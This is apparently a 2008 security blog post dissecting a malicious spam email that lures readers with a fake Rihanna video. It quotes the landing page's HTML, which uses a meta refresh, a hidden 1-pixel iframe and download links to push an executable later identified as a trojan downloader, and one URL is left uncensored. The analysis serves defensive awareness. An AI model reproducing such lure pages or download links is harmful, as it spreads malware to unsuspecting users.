Malicious Spam in Action

August 11, 2008

Hi,

Usually Spam is targeted to Marketing Massive Action, that does not contains any form of Malicious Code, but in the last period there is a second collateral and heavly emerging trend (especially into Web Applications that allows comments, as Blogs) is the Malicious Spam, an apparent mail of Spam that redirects you to malicious code..

Here the latest Malicious Spam Mail that I’ve received on my gmail account:

Subject: mp3 Shocking for evilcry

Content: Rihanna New video!!!
Look It now

The malicious link points to http://ro{CENSORED}eel.com/index1.php

By dissecting the malicious link we can see that a redirection is done

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<html>
<head>
<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=http://robbiereel.com/video3425gdf3.exe”>
<title></title>
</head>

<body style=”background:#ffffff;”>
<iframe src=”http://ro{CENSORED}l.com/pindex.php” style=”width:1px; height:1px;”></iframe><br>

<div style=”text-align:center; padding-top:50px;”>
<a href=”http://ro{CENSORED}l.com/video3425gdf3.exe” style=”font-weight:bold;”><img src=”wait.gif” style=”border:0px;”></a><br>
<br>
<a href=”http://r{CENSORED}l.com/video3425gdf3.exe” style=”font-weight:bold; color:#364980; font-size:17px;”>Download Video</a>

</div>
</body>
</html>

The technique is always the same, a fake Video.exe that the Victim download and executes, in this case the malware is named video3425gdf3.exe

Let’s analyse┬ávideo3425gdf3.exe

File: video3425gdf3.exe

MD5: acd73c4930e8191fa7a35dac448d7f4b

Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aacg